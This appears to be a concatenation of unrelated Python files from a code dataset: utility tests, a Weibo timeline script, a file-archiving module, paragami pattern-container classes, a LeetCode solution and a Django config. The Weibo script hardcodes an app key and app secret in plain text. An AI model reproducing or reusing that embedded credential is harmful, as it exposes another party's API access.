(1, 2, ["foo", "BAR", "baz"], 1),
),
)
def test_simple_acronym_detection(s, i, words, expected):
assert utils.simple_acronym_detection(s, i, words) == expected
@pytest.mark.parametrize(
"s,i,words,acronyms,expected",
(
# TODO: Add more cases
(0, 1, ["FOO", "bar"], ("FOO",), 0),
(0, 1, ["FOO", "bar"], ("BAR",), 2),
),
)
def test_advanced_acronym_detection(s, i, words, acronyms, expected):
assert utils.advanced_acronym_detection(s, i, words, acronyms) == expected
@pytest.mark.parametrize("acronyms", ("HT-TP", "NA SA", "SU.GAR"))
def test_sanitize_acronyms_raises_on_invalid_acronyms(acronyms):
with pytest.raises(InvalidAcronymError):
utils.sanitize_acronyms(acronyms)
@pytest.mark.parametrize(
"words,acronyms,expected",
(
(["foobar"], (), ["Foobar"]),
(["fooBar"], (), ["Foobar"]),
(["FooBar"], (), ["Foobar"]),
(["Foo", "Bar"], ("BAR"), ["Foo", "BAR"]),
),
)
def test_normalize_words(words, acronyms, expected):
assert utils.normalize_words(words, acronyms) == expected
@pytest.mark.parametrize(
"was_upper,words,string,expected",
(
(False, [], "", Case.UNKOWN),
(True, [], "", Case.UPPER),
(False, [], "foobar", Case.LOWER),
(False, ["foo", "Bar"], "", Case.CAMEL),
(False, ["Foo", "Bar"], "", Case.PASCAL),
(False, ["foo", "bar"], "", Case.MIXED),
),
)
def test_determine_case(was_upper, words, string, expected):
assert utils.determine_case(was_upper, words, string) == expected
| python |
from weibo import APIClient
import json
APP_KEY = "3722673574"
APP_SECRET = "3686fea0a65da883b6c2a7586f350425"
CALLBACK_URL = 'https://api.weibo.com/oauth2/default.html'
client = APIClient(app_key=APP_KEY, app_secret=APP_SECRET, redirect_uri=CALLBACK_URL)
with open('token.json', 'r') as f:
r = json.load(f)
access_token = r["access_token"]
expires_in = r["expires_at"]
client.set_access_token(access_token, expires_in)
raw_data = client.get('statuses/public_timeline', count=200)
for x in range(200):
print(str(raw_data['statuses'][x]['text']))
| python |
#!/usr/bin/env python3
# -+- coding: utf-8 -*-
import re
import json
import hashlib
from os import path, makedirs, SEEK_CUR
from harvester import libDataBs
def getOrCreatePath(archive_base_path):
if not path.exists(archive_base_path):
makedirs(archive_base_path)
def setUpDir(site, archive_base_path):
"""Prepare directory and json path for download."""
archive_json = path.join(archive_base_path, "archive.json")
final_dir = path.join(archive_base_path, site)
getOrCreatePath(final_dir)
return final_dir, archive_json
def appendToJson(data, file):
"""Append data to the end of json list without parsing it."""
with open(file, "ab+") as fj:
data_string = "{}]".format(json.dumps(data))
if fj.tell() > 0:
fj.seek(-1, SEEK_CUR) # remove closing bracket of the json list
fj.truncate()
data_string = ", {}".format(data_string)
else:
data_string = "[{}".format(data_string)
b = bytearray()
b.extend(map(ord, data_string))
fj.write(b)
def save(data, timestamp, path_):
"""Save given data into specified environment."""
# prepare directory
final_dir, archive_json = setUpDir(data['site'], path_)
# prepare filename and location
data['md5'] = hashlib.md5(data['content']).hexdigest()
data['timestamp'] = timestamp
filename = str(timestamp) + "_" + data['orig_filename']
filename += ".%s" % data['ext'] if data['ext'] else ""
file_location = path.join(final_dir, filename)
data['location'] = file_location
# check if we already downloaded the file
with libDataBs.DataBs(path_) as db:
print(db.gibData(data['md5']))
if not db.checkHashExistence(data['md5']):
# save the file
with open(file_location, 'wb') as f:
f.write(data['content'])
db.insertData(
{'hash': data['md5'], 'filename': filename, 'count': 1})
else:
# just update the count
db.upCount(data['md5'])
del data['content']
print(data)
# save information about data in json file
appendToJson(data, archive_json)
def urlReg(msg):
"""Try to match an url."""
m = re.match('^.*(https?://(-\.)?([^\s/?\.#-]+\.?)+(/[^\s]*)?)', msg)
if m:
return m.group(1)
return
| python |
from collections import OrderedDict
import itertools
import json
from scipy.sparse import coo_matrix, block_diag
import autograd.numpy as np
from .base_patterns import Pattern
####################
# JSON helpers.
# A dictionary of registered types for loading to and from JSON.
# This allows PatternDict and PatternArray read JSON containing arbitrary
# pattern types without executing user code.
__json_patterns = dict()
def register_pattern_json(pattern, allow_overwrite=False):
"""
Register a pattern for automatic conversion from JSON.
Parameters
------------
pattern: A Pattern class
The pattern to register.
allow_overwrite: Boolean
If true, allow overwriting already-registered patterns.
Examples
-------------
>>> class MyCustomPattern(paragami.Pattern):
>>> ... definitions ...
>>>
>>> paragami.register_pattern_json(paragmi.MyCustomPattern)
>>>
>>> my_pattern = MyCustomPattern(...)
>>> my_pattern_json = my_pattern.to_json()
>>>
>>> # ``my_pattern_from_json`` should be identical to ``my_pattern``.
>>> my_pattern_from_json = paragami.get_pattern_from_json(my_pattern_json)
"""
pattern_name = pattern.json_typename()
if (not allow_overwrite) and pattern_name in __json_patterns.keys():
raise ValueError(
'A pattern named {} is already registered for JSON.'.format(
pattern_name))
__json_patterns[pattern_name] = pattern
def get_pattern_from_json(pattern_json):
"""
Return the appropriate pattern from ``pattern_json``.
The pattern must have been registered using ``register_pattern_json``.
Parameters
--------------
pattern_json: String
A JSON string as created with a pattern's ``to_json`` method.
Returns
-----------
The pattern instance encoded in the ``pattern_json`` string.
"""
pattern_json_dict = json.loads(pattern_json)
try:
json_pattern_name = pattern_json_dict['pattern']
except KeyError as orig_err_string:
err_string = \
'A pattern JSON string must have an entry called pattern ' + \
'which is registered using ``register_pattern_json``.'
raise KeyError(err_string)
if not json_pattern_name in __json_patterns.keys():
err_string = (
'Before converting from JSON, the pattern {} must be ' +
'registered with ``register_pattern_json``.'.format(
json_pattern_name))
raise KeyError(err_string)
return __json_patterns[json_pattern_name].from_json(pattern_json)
def save_folded(file, folded_val, pattern, **argk):
"""
Save a folded value to a file with its pattern.
Flatten a folded value and save it with its pattern to a file using
``numpy.savez``. Additional keyword arguments will also be saved to the
file.
Parameters
---------------
file: String or file
Follows the conventions of ``numpy.savez``. Note that the ``npz``
extension will be added if it is not present.
folded_val:
The folded value of a parameter.
pattern:
A ``paragami`` pattern for the folded value.
"""
flat_val = pattern.flatten(folded_val, free=False)
pattern_json = pattern.to_json()
np.savez(file, flat_val=flat_val, pattern_json=pattern_json, **argk)
def load_folded(file):
"""
Load a folded value and its pattern from a file together with any
additional data.
Note that ``pattern`` must be registered with ``register_pattern_json``
to use ``load_folded``.
Parameters
---------------
file: String or file
A file or filename of data saved with ``save_folded``.
Returns
-----------
folded_val:
The folded value of the saved parameter.
pattern:
The ``paragami`` pattern of the saved parameter.
data:
The data as returned from ``np.load``. Additional saved values will
exist as keys of ``data``.
"""
data = np.load(file)
pattern = get_pattern_from_json(str(data['pattern_json']))
folded_val = pattern.fold(data['flat_val'], free=False)
return folded_val, pattern, data
##########################
# Dictionary of patterns.
class PatternDict(Pattern):
"""
A dictionary of patterns (which is itself a pattern).
Methods
------------
lock:
Prevent additional patterns from being added or removed.
Examples
------------
.. code-block:: python
import paragami
# Add some patterns.
dict_pattern = paragami.PatternDict()
dict_pattern['vec'] = paragami.NumericArrayPattern(shape=(2, ))
dict_pattern['mat'] = paragami.PSDSymmetricMatrixPattern(size=3)
# Dictionaries can also contain dictionaries (but they have to
# be populated /before/ being added to the parent).
sub_dict_pattern = paragami.PatternDict()
sub_dict_pattern['vec1'] = paragami.NumericArrayPattern(shape=(2, ))
sub_dict_pattern['vec2'] = paragami.NumericArrayPattern(shape=(2, ))
dict_pattern['sub_dict'] = sub_dict_pattern
# We're done adding patterns, so lock the dictionary.
dict_pattern.lock()
# Get a random intial value for the whole dictionary.
dict_val = dict_pattern.random()
print(dict_val['mat']) # Prints a 3x3 positive definite numpy matrix.
# Get a flattened value of the whole dictionary.
dict_val_flat = dict_pattern.flatten(dict_val, free=True)
# Get a new random folded value of the dictionary.
new_dict_val_flat = np.random.random(len(dict_val_flat))
new_dict_val = dict_pattern.fold(new_dict_val_flat, free=True)
"""
def __init__(self, free_default=None):
self.__pattern_dict = OrderedDict()
# __lock determines whether new elements can be added.
self.__lock = False
super().__init__(0, 0, free_default=free_default)
def lock(self):
self.__lock = True
def __str__(self):
pattern_strings = [
'\t[' + key + '] = ' + str(self.__pattern_dict[key])
for key in self.__pattern_dict]
return \
'OrderedDict:\n' + \
'\n'.join(pattern_strings)
def __getitem__(self, key):
return self.__pattern_dict[key]
def as_dict(self):
# json.loads returns a dictionary, not an OrderedDict, so
# save the keys in the current order.
contents = {}
for pattern_name, pattern in self.__pattern_dict.items():
contents[pattern_name] = pattern.to_json()
keys = [ key for key in self.__pattern_dict.keys() ]
return {
'pattern': self.json_typename(),
'keys': keys,
'contents': contents}
def _check_lock(self):
if self.__lock:
raise ValueError(
'The dictionary is locked, and its values cannot be changed.')
def __setitem__(self, pattern_name, pattern):
self._check_lock()
# if pattern_name in self.__pattern_dict.keys():
# self.__delitem__(pattern_name)
self.__pattern_dict[pattern_name] = pattern
# We cannot allow pattern dictionaries to change their size
# once they've been included as members in another dictionary,
# since we have no way of updating the parent dictionary's size.
# To avoid unexpected errors, lock any dictionary that is set as
# a member.
if type(self.__pattern_dict[pattern_name]) is PatternDict:
self.__pattern_dict[pattern_name].lock()
self._free_flat_length = self._update_flat_length(free=True)
self._flat_length = self._update_flat_length(free=False)
def __delitem__(self, pattern_name):
self._check_lock()
pattern = self.__pattern_dict[pattern_name]
self.__pattern_dict.pop(pattern_name)
self._free_flat_length = self._update_flat_length(free=True)
self._flat_length = self._update_flat_length(free=False)
def keys(self):
return self.__pattern_dict.keys()
def empty(self, valid):
empty_val = OrderedDict()
for pattern_name, pattern in self.__pattern_dict.items():
empty_val[pattern_name] = pattern.empty(valid)
return empty_val
def validate_folded(self, folded_val, validate_value=None):
for pattern_name, pattern in self.__pattern_dict.items():
if not pattern_name in folded_val:
return \
False, \
'{} not in folded_val dictionary.'.format(pattern_name)
valid, err_msg = pattern.validate_folded(
folded_val[pattern_name], validate_value=validate_value)
if not valid:
err_msg = '{} is not valid.'.format(err_msg)
return False, err_msg
return True, ''
def fold(self, flat_val, free=None, validate_value=None):
free = self._free_with_default(free)
flat_val = np.atleast_1d(flat_val)
if len(flat_val.shape) != 1:
raise ValueError('The argument to fold must be a 1d vector.')
flat_length = self.flat_length(free)
if flat_val.size != flat_length:
error_string = \
('Wrong size for pattern dictionary {}.\n' +
'Expected {}, got {}.').format(
str(self), str(flat_length), str(flat_val.size))
raise ValueError(error_string)
# TODO: add an option to do this -- and other operations -- in place.
folded_val = OrderedDict()
offset = 0
for pattern_name, pattern in self.__pattern_dict.items():
pattern_flat_length = pattern.flat_length(free)
pattern_flat_val = flat_val[offset:(offset + pattern_flat_length)]
offset += pattern_flat_length
# Containers must not mix free and non-free values, so do not
# use default values for free.
folded_val[pattern_name] = \
pattern.fold(pattern_flat_val,
free=free,
validate_value=validate_value)
if not free:
valid, msg = self.validate_folded(
folded_val, validate_value=validate_value)
if not valid:
raise ValueError(msg)
return folded_val
def flatten(self, folded_val, free=None, validate_value=None):
free = self._free_with_default(free)
valid, msg = self.validate_folded(
folded_val, validate_value=validate_value)
if not valid:
raise ValueError(msg)
# flat_length = self.flat_length(free)
# offset = 0
# flat_val = np.full(flat_length, float('nan'))
flat_vals = []
for pattern_name, pattern in self.__pattern_dict.items():
pattern_flat_length = pattern.flat_length(free)
# Containers must not mix free and non-free values, so do not
# use default values for free.
# flat_val[offset:(offset + pattern_flat_length)] = \
flat_vals.append(
pattern.flatten(
folded_val[pattern_name],
free=free,
validate_value=validate_value))
#offset += pattern_flat_length
return np.hstack(flat_vals)
def _update_flat_length(self, free):
# This is a little wasteful with the benefit of being less error-prone
# than adding and subtracting lengths as keys are changed.
return np.sum([pattern.flat_length(free) for pattern_name, pattern in
self.__pattern_dict.items()])
def unfreeing_jacobian(self, folded_val, sparse=True):
jacobians = []
for pattern_name, pattern in self.__pattern_dict.items():
jac = pattern.unfreeing_jacobian(
folded_val[pattern_name], sparse=True)
jacobians.append(jac)
sp_jac = block_diag(jacobians, format='coo')
if sparse:
return sp_jac
else:
return np.array(sp_jac.todense())
def freeing_jacobian(self, folded_val, sparse=True):
jacobians = []
for pattern_name, pattern in self.__pattern_dict.items():
jac = pattern.freeing_jacobian(
folded_val[pattern_name], sparse=True)
jacobians.append(jac)
sp_jac = block_diag(jacobians, format='coo')
if sparse:
return sp_jac
else:
return np.array(sp_jac.todense())
def log_abs_det_unfreeing_jacobian(self, folded_val):
log_abs_det = 0.0
for pattern_name, pattern in self.__pattern_dict.items():
log_abs_det += pattern.log_abs_det_unfreeing_jacobian(
folded_val[pattern_name])
return log_abs_det
def log_abs_det_freeing_jacobian(self, folded_val):
log_abs_det = 0.0
for pattern_name, pattern in self.__pattern_dict.items():
log_abs_det += pattern.log_abs_det_freeing_jacobian(
folded_val[pattern_name])
return log_abs_det
@classmethod
def from_json(cls, json_string):
json_dict = json.loads(json_string)
if json_dict['pattern'] != cls.json_typename():
error_string = \
('{}.from_json must be called on a json_string made ' +
'from a the same pattern type. The json_string ' +
'pattern type was {}.').format(
cls.json_typename(), json_dict['pattern'])
raise ValueError(error_string)
pattern_dict = cls()
for pattern_name in json_dict['keys']:
pattern_dict[pattern_name] = get_pattern_from_json(
json_dict['contents'][pattern_name])
return pattern_dict
def flat_indices(self, folded_bool, free=None):
free = self._free_with_default(free)
valid, msg = self.validate_folded(folded_bool, validate_value=False)
if not valid:
raise ValueError(msg)
flat_length = self.flat_length(free)
offset = 0
indices = []
for pattern_name, pattern in self.__pattern_dict.items():
pattern_flat_length = pattern.flat_length(free)
# Containers must not mix free and non-free values, so do not
# use default values for free.
pattern_indices = pattern.flat_indices(
folded_bool[pattern_name], free=free)
if len(pattern_indices) > 0:
indices.append(pattern_indices + offset)
offset += pattern_flat_length
if len(indices) > 0:
return np.hstack(indices)
else:
return np.array([], dtype=int)
def flat_names(self, free, delim='_'):
flat_names_list = []
for pattern_name, pattern in self.__pattern_dict.items():
pattern_flat_names = pattern.flat_names(free)
# TODO: only append the delimiter for containers
pattern_flat_names = \
[ pattern_name + delim + t for t in pattern_flat_names]
flat_names_list.append(pattern_flat_names)
return np.hstack(flat_names_list)
##########################
# An array of a pattern.
class PatternArray(Pattern):
"""
An array of a pattern (which is also itself a pattern).
The first indices of the folded pattern are the array and the final
indices are of the base pattern. For example, if `shape=(3, 4)`
and `base_pattern = PSDSymmetricMatrixPattern(size=5)`, then the folded
value of the array will have shape `(3, 4, 5, 5)`, where the entry
`folded_val[i, j, :, :]` is a 5x5 positive definite matrix.
Currently this can only contain patterns whose folded values are
numeric arrays (i.e., `NumericArrayPattern`, `SimplexArrayPattern`, and
`PSDSymmetricMatrixPattern`).
"""
def __init__(self, array_shape, base_pattern, free_default=None):
"""
Parameters
------------
array_shape: tuple of int
The shape of the array (not including the base parameter)
base_pattern:
The base pattern.
"""
# TODO: change the name shape -> array_shape
# and have shape be the whole array, including the pattern.
self.__array_shape = tuple(array_shape)
self.__array_ranges = [range(0, t) for t in self.__array_shape]
num_elements = np.prod(self.__array_shape)
self.__base_pattern = base_pattern
# Check whether the base_pattern takes values that are numpy arrays.
# If they are, then the unfolded value will be a single numpy array
# of shape __array_shape + base_pattern.empty().shape.
empty_pattern = self.__base_pattern.empty(valid=False)
if type(empty_pattern) is np.ndarray:
self.__folded_pattern_shape = empty_pattern.shape
else:
# autograd's numpy does not seem to support object arrays.
# The following snippet works with numpy 1.14.2 but not
# autograd's numpy (as of commit 5d49ee anyway).
#
# >>> import autograd.numpy as np
# >>> foo = OrderedDict(a=5)
# >>> bar = np.array([foo for i in range(3)])
# >>> print(bar[0]['a']) # Gives an index error.
#
raise NotImplementedError(
'PatternArray does not support patterns whose folded ' +
'values are not numpy.ndarray types.')
self.__shape = tuple(self.__array_shape) + empty_pattern.shape
super().__init__(
num_elements * base_pattern.flat_length(free=False),
num_elements * base_pattern.flat_length(free=True),
free_default=free_default)
def __str__(self):
return('PatternArray {} of {}'.format(
self.__array_shape, self.__base_pattern))
def as_dict(self):
return {
'pattern': self.json_typename(),
'shape': self.__shape,
'array_shape': self.__array_shape,
'base_pattern': self.__base_pattern.to_json() }
def array_shape(self):
"""The shape of the array of parameters.
This does not include the dimension of the folded parameters.
"""
return self.__array_shape
def shape(self):
"""The shape of a folded value.
"""
return self.__shape
def base_pattern(self):
return self.__base_pattern
def validate_folded(self, folded_val, validate_value=None):
if folded_val.ndim != len(self.__shape):
return \
False, \
'Wrong number of dimensions. Expected {}, got {}.'.format(
folded_val.ndim, len(self.__shape))
if folded_val.shape != self.__shape:
return \
False, \
'Wrong shape. Expected {}, got {}.'.format(
folded_val.shape, self.__shape)
for item in itertools.product(*self.__array_ranges):
valid, msg = self.__base_pattern.validate_folded(
folded_val[item], validate_value=validate_value)
if not valid:
err_msg = 'Bad value in location {}: {}'.format(item, msg)
return False, err_msg
return True, ''
def empty(self, valid):
empty_pattern = self.__base_pattern.empty(valid=valid)
repeated_array = np.array(
[empty_pattern
for item in itertools.product(*self.__array_ranges)])
return np.reshape(repeated_array, self.__shape)
def _stacked_obs_slice(self, item, flat_length):
"""
Get the slice in a flat array corresponding to ``item``.
Parameters
-------------
item: tuple
A tuple of indices into the array of patterns (i.e.,
into the shape ``__array_shape``).
flat_length: integer
The length of a single flat pattern.
Returns
---------------
A slice for the elements in a vector of length ``flat_length``
corresponding to element item of the array, where ``item`` is a tuple
indexing into the array of shape ``__array_shape``.
"""
assert len(item) == len(self.__array_shape)
linear_item = np.ravel_multi_index(item, self.__array_shape) * flat_length
return slice(linear_item, linear_item + flat_length)
def fold(self, flat_val, free=None, validate_value=None):
free = self._free_with_default(free)
flat_val = np.atleast_1d(flat_val)
if len(flat_val.shape) != 1:
raise ValueError('The argument to fold must be a 1d vector.')
if flat_val.size != self.flat_length(free):
error_string = \
'Wrong size for parameter. Expected {}, got {}'.format(
str(self.flat_length(free)), str(flat_val.size))
raise ValueError(error_string)
flat_length = self.__base_pattern.flat_length(free)
folded_array = np.array([
self.__base_pattern.fold(
flat_val[self._stacked_obs_slice(item, flat_length)],
free=free, validate_value=validate_value)
for item in itertools.product(*self.__array_ranges)])
folded_val = np.reshape(folded_array, self.__shape)
if not free:
valid, msg = self.validate_folded(
folded_val, validate_value=validate_value)
if not valid:
raise ValueError(msg)
return folded_val
def flatten(self, folded_val, free=None, validate_value=None):
free = self._free_with_default(free)
valid, msg = self.validate_folded(
folded_val, validate_value=validate_value)
if not valid:
raise ValueError(msg)
return np.hstack(np.array([
self.__base_pattern.flatten(
folded_val[item], free=free, validate_value=validate_value)
for item in itertools.product(*self.__array_ranges)]))
def flat_length(self, free=None):
free = self._free_with_default(free)
return self._free_flat_length if free else self._flat_length
def unfreeing_jacobian(self, folded_val, sparse=True):
base_flat_length = self.__base_pattern.flat_length(free=True)
base_freeflat_length = self.__base_pattern.flat_length(free=True)
jacobians = []
for item in itertools.product(*self.__array_ranges):
jac = self.__base_pattern.unfreeing_jacobian(
folded_val[item], sparse=True)
jacobians.append(jac)
sp_jac = block_diag(jacobians, format='coo')
if sparse:
return sp_jac
else:
return np.array(sp_jac.todense())
def freeing_jacobian(self, folded_val, sparse=True):
base_flat_length = self.__base_pattern.flat_length(free=True)
base_freeflat_length = self.__base_pattern.flat_length(free=True)
jacobians = []
for item in itertools.product(*self.__array_ranges):
jac = self.__base_pattern.freeing_jacobian(
folded_val[item], sparse=True)
jacobians.append(jac)
sp_jac = block_diag(jacobians, format='coo')
if sparse:
return sp_jac
else:
return np.array(sp_jac.todense())
@classmethod
def from_json(cls, json_string):
json_dict = json.loads(json_string)
if json_dict['pattern'] != cls.json_typename():
error_string = \
('{}.from_json must be called on a json_string made ' +
'from a the same pattern type. The json_string ' +
'pattern type was {}.').format(
cls.json_typename(), json_dict['pattern'])
raise ValueError(error_string)
base_pattern = get_pattern_from_json(json_dict['base_pattern'])
return cls(
array_shape=json_dict['array_shape'], base_pattern=base_pattern)
def flat_indices(self, folded_bool, free=None):
free = self._free_with_default(free)
valid, msg = self.validate_folded(folded_bool, validate_value=False)
if not valid:
raise ValueError(msg)
indices = []
pattern_flat_length = self.__base_pattern.flat_length(free=free)
offset = 0
for item in itertools.product(*self.__array_ranges):
if np.any(folded_bool[item]):
pattern_indices = self.__base_pattern.flat_indices(
folded_bool[item], free=free)
if len(pattern_indices) > 0:
indices.append(pattern_indices + offset)
offset += pattern_flat_length
if len(indices) > 0:
return np.hstack(indices)
else:
return np.array([], dtype=int)
register_pattern_json(PatternDict)
register_pattern_json(PatternArray)
| python |
class Recall:
def __init__(self, max_count=10):
self.max_count = max_count
self.position = 0
self.buffer = []
def move_up(self):
if self.position < len(self.buffer) - 1:
self.position += 1
return self.buffer[self.position]
def move_down(self):
if self.position > 0:
self.position -= 1
return self.buffer[self.position]
else:
self.position = -1
def append(self, text):
self.position = -1
if text not in self.buffer:
if len(self.buffer) >= self.max_count:
self.buffer = [text] + self.buffer[:self.max_count - 1]
else:
self.buffer.insert(0, text)
elif self.buffer[0] != text:
self.buffer.remove(text)
self.buffer.insert(0, text)
| python |
# https://leetcode.com/problems/3sum/
class Solution:
def threeSum(self, nums: List[int]) -> List[List[int]]:
res = set()
nums = sorted(nums)
for k in range(0, len(nums)):
target = -(nums[k])
l, r = k+1, len(nums)-1
while(l<r):
sum_two = nums[l]+nums[r]
if sum_two < target:
l += 1
elif sum_two > target:
r -= 1
else:
res.add((nums[k],nums[l],nums[r]))
l += 1
r -= 1
return res
| python |
from django.apps import AppConfig
class GradedConfig(AppConfig):
name = 'graded'
| python |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.